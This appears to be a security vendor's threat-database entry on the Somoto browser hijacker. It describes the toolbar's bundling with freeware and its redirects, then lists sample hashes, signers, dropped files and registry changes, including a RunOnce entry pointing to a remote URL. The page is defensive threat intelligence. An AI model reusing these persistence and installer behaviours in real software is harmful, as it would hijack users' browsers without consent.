Multi-License Discount Quote

Change Region

English
Threat Database Browser Hijackers Somoto

Somoto

By ZulaZuza in Browser Hijackers

Threat Scorecard

Threat Level: 80 % (High)
Infected Computers: 3
First Seen: August 26, 2011
Last Seen: October 24, 2025
OS(es) Affected: Windows

The Somoto browser hijacker is a malicious toolbar and malware infection that is typically included in some freeware downloads. The Somoto browser hijacker and toolbar has been associated with several free applications for playing .flv movies (such as downloaded YouTube movies. The Somoto browser hijacker significantly alters your computer's browsing behavior. This malicious infection can cause your Internet browser to redirect you constantly to the somoto.com website. This website is a fake version of the Google search engine, designed to display results that are associated with malware and Trojan infections. If your Internet browser is constantly directing you to the Somoto website, ESG PC security researchers strongly recommend booting your PC in Safe Mode. Then, it is important that you use a fully-updated anti-malware utility to detect and remove the Somoto browser hijacker and its associated malware.

The Underlying Cause of the Somoto Infection

Most cases of infection with the Somoto browser hijacker are associated with a video application named FLV & AVI player. There are several versions of this freeware application. As part of its installation process, this program will install the Somoto toolbar and browser hijacker onto your computer. If you remove Somoto, the video player associated with Somoto will often refuse to open. ESG PC security researchers strongly recommend avoiding any applications that force you to download and install the Somoto toolbar. There are numerous free, effective video players that can give you great results without needing to download malware or install a bulky, malicious toolbar onto your Internet browser (for example, the VLC video player).

Problems Associated with the Somoto Browser Hijacker

The Somoto browser hijacker has several harmful effects on a computer system. Computer users that have become infected with this malicious toolbar report that their Internet browser homepage has been changed. The Somoto browser hijacker can also redirect your web browsing, sending you to websites that contain malicious advertisements and malware-ridden links. The Somoto infection acts as a gateway through which other more dangerous kinds of malware can infect your computer system. It is because of this that ESG PC security researchers strongly advise against leaving a Somoto infection on your computer. Having the ability to play .flv video files is not worth the risk or the annoyance of having the Somoto toolbar installed onto your computer. Other free and safe alternatives exist that can allow you to watch any format of video on your computer system.

File System Details

Somoto may create the following file(s):
Expand All | Collapse All
# File Name Detections
1. C:Program Filessomototoolbar[RANDOM CHARACTERS].exe

Registry Details

Somoto may create the following registry entry or registry entries:
HKEY..\..\..\..{RegistryKeys}
HKLMSOFTWAREMicrosoftWindowsCurrentVersionexplorerBrowser Helper Objects{c3721e85-f0ac-4b7e-ae4c-3e738011dc9d}

Analysis Report

General information

Family Name: Trojan.Somoto
Signature status: Root Not Trusted

Known Samples

MD5: 306195070e249ecd756a4367e8bd585d
SHA1: 97763e6a25238b6096fe4850b26c199af0266e91
File Size: 4.78 MB, 4783892 bytes
MD5: 0737a21f1a1292500d23ea95577aba7a
SHA1: dbc2ded36407673d6e11c0de5d758413602b68af
File Size: 162.09 KB, 162088 bytes
MD5: 07d1be88fb2d9e700e835019c153e4db
SHA1: 1722c50cb846447538d80bde7fdab032aaa0b36d
SHA256: 23F4FC00AA55F5CDBBE66D1762D3C39017A49307296B51984C2248BF97C6C98B
File Size: 430.94 KB, 430944 bytes
MD5: 1a79ca43270998428ceb02d6a3b1bbde
SHA1: 741cd1617ca732a9557aae6adc94b09ed834a528
SHA256: 88869E7AA01AD49346EC3AAFD8CBC855FBA20A896A00A16853A535883543A337
File Size: 2.37 MB, 2369795 bytes
MD5: cc4929c63dc71bc807f9853ce7ff37c9
SHA1: 9bd2c2fe08bb00530030da2bbdad35cc5b73d120
SHA256: 84BA61A76571E6C100700AA91483485590F4C2C47181EA2718CEBC2175C03766
File Size: 170.84 KB, 170840 bytes
Show More
MD5: b5f7787e036a7ae9c5eed54156ea0a1c
SHA1: bbea846b428327d7751ba55c2d187c46c6ede75b
SHA256: 5AE2B9A539438EB9DBE3548AC6FC17DCF12F52763C9FE3EF2E0BFF8FCF2D3FE7
File Size: 430.56 KB, 430560 bytes
MD5: 90b3c3888b48fc3f19ffa24d0708b809
SHA1: 772f121128a1196fb3a0902685bd2c3ce977df47
SHA256: 9173CBB0B3BCE89051F837619087421C690642658E97DC4BDA9834EA97E3E244
File Size: 163.53 KB, 163528 bytes
MD5: c7b068ec2bb94d52f46c03279ecb77c2
SHA1: 7e967b2ac7d5c358275ada39ad23d5cb9aa4337c
SHA256: D2E42F67AF210A73D07D5EE7D8B37E362304F4853B5BB02DEDE1CB08A483E9DB
File Size: 413.26 KB, 413264 bytes
MD5: fd466b320b77d42012f340ff2e58ae37
SHA1: 1daefe7b77508ca24e22f2062d1765842b47ae93
SHA256: 2158CCD1EF2A1AE39207DD47F8C0A27FEC27F510B5E6546EB9CAF289EDC68A43
File Size: 166.60 KB, 166600 bytes
MD5: b476b31c1dc169000605037a1aded5c9
SHA1: 9e302ae3fc6f3434fb09fc1ce1a098f7851aec17
SHA256: B7FDFE32F07EDA4C31E0DCD99D2527C06E9E15274E75D03CF58B97C45BB49CD3
File Size: 430.91 KB, 430912 bytes
MD5: 0e2549d6bbb8f47b0da0f2c4ea9294ee
SHA1: 74c5c8ea59a93322f7d5426f7ea3512175b8dda0
SHA256: C658BEE5CE338A9486646AE27571DFA9CF67B658B3116CDEF5CFB3294826C97A
File Size: 430.93 KB, 430928 bytes
MD5: 3487fb79614eb5f3278fc7371a2c596c
SHA1: 4ca3823b1c611860366c4b63ec23fcbeeca03c73
SHA256: 807AA0C350B4B99E78A3233A8ECAF4D477074AB9AC96283F2063E2FFB830E17B
File Size: 236.96 KB, 236960 bytes
MD5: 9937d85fdb91104eb94ed53d22c80f21
SHA1: aea262c84019e2d2fcdf419467f0ed9ce6137eae
SHA256: 67B635E7A1EB79EDE75E1E57B36AE9686B3F8BB66AFFEB4B5BB6BA294E1B45D8
File Size: 432.39 KB, 432392 bytes
MD5: 13b1812acb56442725f20305c0a91fa0
SHA1: 84b9b21c9f5e073f240513816b47c763accd34fb
SHA256: 2F9AD41309F0F656A7C6CE6FF0EC2A8ADEB759A4EB00C362053990A83007098D
File Size: 430.34 KB, 430344 bytes
MD5: 35a519a17ebebd6fad23144f985294bf
SHA1: 550a4bfbf4e75515f0ca5126eb3dc855331b4be2
SHA256: 2D49BB97C7090BE1BBD115CFA713DC197C98EEB40F3E4E2CA74C4B4BAEC1EE42
File Size: 68.21 KB, 68214 bytes
MD5: 917f14c5bf8e2e79a8512dec476c3805
SHA1: 5f235e599141555f7dffce810d972efd21e54760
SHA256: 31A949D4F73D27CF33895C73268AB79F3F56568FF07BCA7FD3B6C72B85C05AC2
File Size: 79.49 KB, 79490 bytes
MD5: d430c87440fc644d6bbf710ab98402b6
SHA1: c15237e60cd3a6df282d2be7155556140ef7e331
SHA256: 2CFCB3B5E3661FE6714BC1E9B8F017E740B0213E4E194B5DEFD1F8B30B6147A3
File Size: 48.64 KB, 48640 bytes
MD5: 490c79e8725f9dfc167d217f1049bb6e
SHA1: 84bad32c6b44369739fee95c09f5c65bb406abe0
SHA256: 61DD89C4280BA3B138D51F3B36732E4CF61D9C9810FE3C3CA0A1731FD9D8E80C
File Size: 165.74 KB, 165736 bytes
MD5: 7189a32af9a65714975ce1173149bdd0
SHA1: 9f51722877b52840ca94e6385edf5cdf576d7239
SHA256: 2D4EA033D1315796BFF297D47F5EC8697CCD290AE64902E627FB305D7FC2E3A9
File Size: 166.65 KB, 166648 bytes
MD5: c1c424b067eb75a2ac1253718a8872dc
SHA1: 57b18ebf961237cdb8c2e83895933513c519f5be
SHA256: 11F1540E950D974AE3FD093725084101154D31E2208BFF3AFD971CB89564918F
File Size: 413.38 KB, 413376 bytes
MD5: 210adf17c06df7d8abe17f5f748f170e
SHA1: bc3bbcdb0ae9e55f1e95d1546dec71ad6fa84fac
SHA256: D357CD643492F330CB7197463A7EB06EC973F6BBA39FC05739E89F930551D71C
File Size: 430.93 KB, 430928 bytes
MD5: 6c798773006b38a583b7d19ca428f6af
SHA1: c9674039551bdcbd8b35b8a25337aa7a7ef7cfd3
SHA256: 1DAC26F7C672403A3A8158670AED42FFC7734816AD2746EEDBBE9891FEF33754
File Size: 430.89 KB, 430888 bytes
MD5: 73d68587f907da59cc57957df7bd0c73
SHA1: 11575c9383a99e48641bd823ab8012c5fb80d281
SHA256: 17FC79BD45A7AB502A8AE1F8B76A08CA3181BF17A91557C9BB891875917871A4
File Size: 225.43 KB, 225432 bytes
MD5: f596d9d50049463a736668945ab50235
SHA1: 70d1d67c1f0a2d5a120eb07a3bc16cfd3efd178e
SHA256: E2E78DBE3B40672C12403C25BEB49BF1EE83012462AF571A3E8BF4D3064C8F82
File Size: 413.30 KB, 413304 bytes
MD5: a980a9eb7d725e139655101346eb8eb1
SHA1: d8cd42a71e62e2a1b8dac57ba9f86a2f9b1fccd5
SHA256: F001BB28F270BDE6947A7627D20CD21B02011793728CF4D1B53FBE8F59F30AEC
File Size: 167.53 KB, 167528 bytes
MD5: ab5a2dace2136c0ac08bf6b833a9d45f
SHA1: cc191d706f90d16886ec19806f4454b22d2b41f9
SHA256: AD547780E31185348CD3F6E0E5028E31BA75979B0DE1CCB522CA0ADC353199B7
File Size: 430.56 KB, 430560 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File has TLS information
  • File is 32-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
Show More
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Name Value
Comments This installation was built with Inno Setup.
Company Name
  • Acala Software Inc.
  • Accmeware Corporation
  • Somoto Ltd.
File Description
  • Acala DVD Copy - Free Copy Setup
  • FilesFrog Update Checker
  • OGG to MP3 Converter Setup
  • Powered by BetterInstaller
File Version
  • 4.3.0.0
  • 2.1.0.0
  • 2.0.0.0
  • 1.0.0.1
Legal Copyright Somoto Ltd.
Product Name
  • Acala DVD Copy - Free Copy
  • FilesFrog Update Checker
  • OGG to MP3 Converter
Product Version 4.3.0

Digital Signatures

Signer Root Status
Site on Spot Limited AddTrust External CA Root Root Not Trusted
Somoto Ltd. AddTrust External CA Root Root Not Trusted
Somoto Ltd. AddTrust External CA Root Hash Mismatch
Site on Spot Limited Site on Spot Limited Self Signed
Somoto Ltd VeriSign Class 3 Public Primary Certification Authority - G5 Root Not Trusted
Show More
SITE ON SPOT Ltd. thawte Primary Root CA Root Not Trusted
Somoto Ltd. thawte Primary Root CA Root Not Trusted

File Traits

  • Installer Manifest
  • nosig nsis
  • x86

Files Modified

File Attributes
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
\device\namedpipe\gmdasllogger Generic Write,Read Attributes
c:\users\user\appdata\local\temp\biclient.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\biclient.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\config.ini Generic Write,Read Attributes
c:\users\user\appdata\local\temp\config.ini Synchronize,Write Attributes
c:\users\user\appdata\local\temp\getcountry Generic Write,Read Attributes
c:\users\user\appdata\local\temp\installquit Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-70tm1.tmp\741cd1617ca732a9557aae6adc94b09ed834a528_0002369795.tmp Generic Write,Read Attributes
Show More
c:\users\user\appdata\local\temp\is-8a7vu.tmp\97763e6a25238b6096fe4850b26c199af0266e91_0004783892.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsa4cd5.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsa4cd5.tmp\inetc.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsa4cd5.tmp\inetc.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsa4cd5.tmp\killprocdll.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsa4cd5.tmp\killprocdll.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsaa3ec.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsaa3ed.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsaa3ed.tmp\7za.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsaa3ed.tmp\7za.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsaa3ed.tmp\7za.exe_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsaa3ed.tmp\[random_string].7z Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsaa3ed.tmp\[random_string].7z Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsaa3ed.tmp\[random_string].7z_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsaa3ed.tmp\install53337.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsaa3ed.tmp\install53337.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsaa3ed.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsaa3ed.tmp\nsexec.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsc2e18.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsca833.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsca833.tmp\fri594.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsca833.tmp\fri594.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsca833.tmp\fri594.exe_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsca833.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsca833.tmp\nsexec.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsd2e1.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nse5645.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsec05d.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsec05d.tmp\7za.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsec05d.tmp\7za.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsec05d.tmp\7za.exe_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsec05d.tmp\[random_string].7z Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsec05d.tmp\[random_string].7z Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsec05d.tmp\[random_string].7z_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsec05d.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsec05d.tmp\nsexec.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsf59ea.tmp\7za.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsf59ea.tmp\[random_string].7z Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsf59ea.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsff6e1.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsff6e2.tmp\7za.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsff6e2.tmp\[random_string].7z Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsff6e2.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsh6a02.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\3di706esz46x Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\3di706esz46x Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\bqeu1pj52d9pqz6f5p Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\bqeu1pj52d9pqz6f5p Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\dcryptdll.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\dcryptdll.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\lzma.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\lzma.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\nsexec.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\system.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\system.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\xcay2u447eu Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nshe9c1.tmp\xcay2u447eu Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsi9d44.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsi9d45.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsica6e.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsla3dd.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsn6278.tmp\7za.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsn6278.tmp\[random_string].7z Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsn6278.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsn6a70.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsna832.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nso7ef4.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nso7ef5.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nso7ef5.tmp\7za.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nso7ef5.tmp\7za.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nso7ef5.tmp\7za.exe_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nso7ef5.tmp\[random_string].7z Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nso7ef5.tmp\[random_string].7z Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nso7ef5.tmp\[random_string].7z_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nso7ef5.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nso7ef5.tmp\nsexec.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nso7ef5.tmp\setupcl.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nso7ef5.tmp\setupcl.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsoba3.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsoba3.tmp\7za.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsoba3.tmp\7za.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsoba3.tmp\7za.exe_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsoba3.tmp\[random_string].7z Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsoba3.tmp\[random_string].7z Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsoba3.tmp\[random_string].7z_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsoba3.tmp\install48818.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsoba3.tmp\install48818.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsoba3.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsoba3.tmp\nsexec.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsoc04c.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsq59da.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsqa3fd.tmp\7za.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsqa3fd.tmp\[random_string].7z Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsqa3fd.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsra757.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsra758.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsra758.tmp\7za.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsra758.tmp\7za.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsra758.tmp\7za.exe_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsra758.tmp\[random_string].7z Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsra758.tmp\[random_string].7z Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsra758.tmp\[random_string].7z_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsra758.tmp\install25064.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsra758.tmp\install25064.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsra758.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsra758.tmp\nsexec.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nss2e19.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nss2e19.tmp\inetc.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nss2e19.tmp\inetc.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nss2e19.tmp\system.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nss2e19.tmp\system.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nss4ad0.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nss69f2.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nst2f2.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nst5646.tmp\7za.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nst5646.tmp\[random_string].7z Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nst5646.tmp\install48553.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nst5646.tmp\install48553.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nst5646.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nstc221.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nstc222.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nstc222.tmp\7za.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nstc222.tmp\7za.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nstc222.tmp\7za.exe_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nstc222.tmp\[random_string].7z Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nstc222.tmp\[random_string].7z Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nstc222.tmp\[random_string].7z_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nstc222.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nstc222.tmp\nsexec.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nstc222.tmp\setupcl.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nstc222.tmp\setupcl.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsu74f0.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsu74f1.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsu74f1.tmp\7za.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsu74f1.tmp\7za.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsu74f1.tmp\7za.exe_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsu74f1.tmp\[random_string].7z Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsu74f1.tmp\[random_string].7z Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsu74f1.tmp\[random_string].7z_deleted_ Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsu74f1.tmp\install52427.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsu74f1.tmp\install52427.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsu74f1.tmp\nsexec.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsu74f1.tmp\nsexec.dll Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsx4a05.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsx6267.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsx6a5f.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\nsxca7e.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nsyb92.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\local\temp\uninstallcomplete Generic Write,Read Attributes
c:\users\user\appdata\local\temp\xx.ini Generic Write,Read Attributes
c:\users\user\appdata\local\temp\~nsu.tmp\au_.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\downloads Synchronize,Write Attributes

Registry Modifications

Key::Value Data API Name
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations \??\C:\Users\Jerbuoiw\AppData\Local\Temp\biclient.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 鍎ꄮ๙ǜ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\content::cacheprefix RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\cookies::cacheprefix Cookie: RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\history::cacheprefix Visited: RegNtPreCreateKey
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations \??\C:\Users\Jkquqjyg\AppData\Local\Temp\biclient.exe RegNtPreCreateKey
Show More
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe Ꮥ䩶⽻ǜ RegNtPreCreateKey
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations \??\C:\Users\Kkegjcwd\AppData\Local\Temp\nseC05D.tmp\ RegNtPreCreateKey
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations \??\C:\Users\Unenjolo\AppData\Local\Temp\biclient.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 碑䕱ǜ RegNtPreCreateKey
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations \??\C:\Users\Ldivzwzj\AppData\Local\Temp\nsu74F1.tmp\ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 繨ᓸ䥄ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe RegNtPreCreateKey
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations \??\C:\Users\Mdoonnlr\AppData\Local\Temp\nshE9C1.tmp\ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 儨ǜ RegNtPreCreateKey
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations \??\C:\Users\Yqojxlgl\AppData\Local\Temp\nsoBA3.tmp\ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 万㓑斺ǜ RegNtPreCreateKey
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations \??\C:\Windows\SystemTemp\a9dd6c3f-d641-4292-855a-e9c09c1b694b.tmp\??\C:\Windows\SystemTemp\85968c61-a19d-4e7b-a80f-d2a1fc3c08 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 兯棐ǜ RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\internet explorer\abouturls::tabs res://ieframe.dll/tabswelcome.htm RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\runonce::facesmooch-uninstall http://www.bigseekpro.com/u_end RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 鯥ȁ獖}偫~엦1dᵂċᵆċ RegNtPreCreateKey
